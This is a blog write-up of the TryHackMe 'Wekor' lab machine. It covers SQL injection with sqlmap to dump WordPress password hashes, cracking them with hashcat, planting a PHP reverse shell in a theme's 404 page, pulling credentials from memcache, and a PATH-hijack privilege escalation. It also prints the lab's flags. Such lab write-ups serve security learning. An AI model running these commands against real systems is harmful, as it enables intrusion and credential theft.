d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-wekor-thm/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

221 lines
8.9 KiB
Markdown
Raw Permalink Blame History

---
title: "Writeup - Wekor (THM)"
date: 2022-04-17
slug: "writeup-wekor-thm"
type: "writeup-ctf"
---
This is a writeup for the [Wekor](https://tryhackme.com/room/wekorra) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.11.146
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 8.2)
- 80/tcp : HTTP web server (Apache 2.4.41)
## Exploit
At first I start by listing the pages of the website.
![](img/image-2.webp)
I find a `robots.txt` file in which the following pages are listed:
```bash
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
```
While exploring I come across the following message:
```bash
Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot !
```
So there is a site hosted in the `it-next` next folder:
![](img/image-3.webp)
After some research I find an `Applie coupon` field on the `it_cart.php` page. I get a query using burp, then I run `sqlmap` to extract the database list.
```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ sqlmap -r request.txt --dbs --batch
___
__H__
___ ___[(]_____ ___ ___ {1.6.4#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[...]
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:07:49] [INFO] fetching database names
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[16:07:49] [INFO] fetched data logged to text files under '/home/d3vyce/.local/share/sqlmap/output/wekor.thm'
[*] ending @ 16:07:49 /2022-04-13/
```
I find a `wordpress` database, I will try to extract it with the following command:
```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ sqlmap -r request.txt -D wordpress --dump --batch
[...]
[4 entries]
+------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1 | http://site.wekor.thm/wordpress | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B. | admin@wekor.thm | admin | 0 | admin | admin | 2021-01-21 20:33:37 | <blank> |
| 5743 | http://jeffrey.com | $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10 | jeffrey@wekor.thm | wp_jeffrey | 0 | wp jeffrey | wp_jeffrey | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
| 5773 | http://yura.com | $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/ | yura@wekor.thm | wp_yura | 0 | wp yura | wp_yura | 2021-01-21 20:35:27 | <blank> |
| 5873 | http://eagle.com | $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/ (xxxxxx) | eagle@wekor.thm | wp_eagle | 0 | wp eagle | wp_eagle | 2021-01-21 20:36:11 | <blank> |
+------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
[...]
```
In the interval I find 4 user/password pairs. I put them in a file and I run `hashcat`.
```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ hashcat -m 400 hash wordlist/rockyou.txt
[...]
$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/:xxxxxx (eagle)
$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10:rockyou (jeffrey)
$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/:soccer13 (yura)
[...]
```
After a few seconds, we find all the passwords except the one of Admin. Now that we have credentials, we need to find the wordpress site; I launch a subdomain scan.
![](img/image-4.webp)
I find the `site` subdomain, I add it to the `/etc/hosts`, then I go to the site. On this page, I find the following text:
```bash
Hi there!
Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS!
- Jim
```
This does not bring me much, so I launch a page scan on this subdomain.
![](img/image-5.webp)
After a few seconds I finally found the WordPress site!
![](img/image-6.webp)
So I go to the `wp-admin` page to connect to the admin panel. After trying the user `jeffrey`, I realize that he doesn't have admin permission, so I test the user `yura` and it works. I can now modify the content of the 404.php page of the twentytwentyone theme to add this [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php).
By accessing the following page I execute the php code :
```bash
http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php
```
I now have a reverse shell, but I don't have access to the first flag.
![](img/image-7.webp)
So I look if I can't find a file with an interesting service to change the user. In the open ports, I find the port 11211 :
![](img/image-8.webp)
After some research I find the following page of the [HackTricks](https://book.hacktricks.xyz/pentesting/11211-memcache) blog. After some experimentation, I manage to get the credencials of the user Orka in the cache.
![](img/image-9.webp)
I can now change the user and get the first flag back.
```bash
Orka@osboxes:~$ cat user.txt
cat user.txt
1a26a6d51c0172400add0e297608dec6
```
## Privilege escalation
I start by checking the user's authorization. Interestingly, my user has the right to run the `bitcoin` script with root rights.
![](img/image-10.webp)
I try to launch the script but without success, it needs a password to launch it.
![](img/image-11.webp)
So I try to extract the strings from the program and I find the following in the result:
```bash
Orka@osboxes:~/Desktop$ strings bitcoin
[...]
Enter the password :
password
Access Denied...
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins :
Sorry, This is not a valid amount!
python /home/Orka/Desktop/transfer.py %c
[...]
```
The password to use the program would be `password` and then there is the execution of a python script. What is interesting is the use of python without using a relative route. This combined with the fact that I have write permissions in the `/usr/sbin/python` folder which is in the `$PATH` variable, I will be able to create a custom version of the python program.ndes suivante :
```bash
touch /usr/sbin/python
echo '#!/bin/bash' > /usr/sbin/python
echo '/bin/bash' >> /usr/sbin/python
chmod +x /usr/sbin/python
```
I now run the `bitcoin` program with sudo and enter the password.
![](img/image-12.webp)
I am now root of the machine and I can get the last flag.
```bash
root@osboxes:~/Desktop# cat /root/root.txt
cat /root/root.txt
f4e788f87cc3afaecbaf0f0fe9ae6ad7
```
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Sanitizing Inputs must be implemented to avoid SQL injections
- Use strong passwords
- Set up Memcached authentication
- Use absolute paths when using programs in scripts
Reference in New Issue View Git Blame Copy Permalink